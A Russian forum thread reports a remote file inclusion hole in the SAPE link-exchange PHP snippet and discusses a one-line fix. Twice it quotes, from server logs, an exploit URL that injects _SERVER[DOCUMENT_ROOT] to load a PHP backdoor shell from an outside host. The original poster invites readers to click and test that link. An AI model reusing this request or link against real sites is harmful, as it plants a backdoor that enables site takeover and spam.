Форум SAPE.RU - Уязвимость сайта после вставки кода sape

Форум SAPE.RU (http://forum.sape.ru/index.php)

- Ошибки при работе с системой (http://forum.sape.ru/forumdisplay.php?f=14)

- - Уязвимость сайта после вставки кода sape (http://forum.sape.ru/showthread.php?t=50949)

Уязвимость сайта после вставки кода sape

Практика показала, что на некоторых хостингах и для некоторых движков код

Код:

<?php 

     if (!defined('_SAPE_USER')){

        define('_SAPE_USER', 'd56b17c1d94442b8874c6ad44aae3202'); 

     }

     require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); 

     $sape = new SAPE_client();

?>

является уязвимым! А именно строчка
require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');

Злоумышненники, используя запрос вида
http://www.ваш-сайт.ru////?_SERVER[D...afterlife.txt? могут нарушить работу вашего сайта, в том числе рассылать спам от имени вашего сайта.

В качестве строчки после _SERVER[DOCUMENT_ROOT] используется ссылка на код эксплоита (ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно), а заодно проверить, не случится ли чего с вашим сайтом, если его подставить на место www.ваш-сайт.ru).

Решение проблемы на стороне сайта:
заменить

Код:

require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');

на

Код:

require_once(getenv('DOCUMENT_ROOT').'/'._SAPE_USER.'/sape.php');

Просьба к разработчикам sape проверить, не противоречит ли моя замена чему-либо и, если нет, то обновить код для вставки для всех.

уходите с хостинга, если вас ломанули.
и гуглите про register globals

Цитата:

ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно)

каспер не пустил...

Цитата:

Обнаружена угроза:
объект заражен Backdoor.PHP.Rst.f

Цитата:

Сообщение от MonAmur (Сообщение 789137)

каспер не пустил...

аналогичная фигня....

Это что, такой оригинальный способ распространят вирусы ТС придумал? -)))

dark, уходить с хостинга - вариант, переписать движок - тоже вариант (нормально написанный движок и нормально настроенный хостинг такой уязвимости не должны допустить), но если изменить в коде сапы одну строчку, то без потери функциональности проблемы можно избежать (кмк) на любом движке и на любом хостинге.

Shema, неизвестно где и сколько еще в твоем сайте таких уязвимостей

sylex, конечно, неизвестно.

И кстати проверил все свои сайты - сапа не добавила уязвимостей нормально написанному сайту. А вот затрояненный клиент на поддержку достался - куча сайтов с этой проблемой. А учитывая, что у сапы десятки тысяч сайтов, то даже пара процентов проблемных - это много. Поэтому, считаю, что если можно повысить безопасность кода, это надо сделать.

Shema, абсолютно все могут НЕ пользоваться строчкой $_SERVER['DOCUMENT_ROOT'].
Что во первых - не уберет уязвимость, если она есть на этом хостинге.
2 - в приведенном примере что то сапы?

Ну а объяснить как ставить по другому чтобы было понятно ВСЕМ и работало ...

ТС, мои соболезнования, если ваш хост и сайт позволяют подставлять в ГЕт суперглобальные переменные, то...

Цитата:

http://www.xn----7sbbf2b7bj7b.ru////?_SERVER[DOCUMENT_ROOT]=http://jokernet.fileave.com/afterlife.txt?

где там сапа, ума не приложу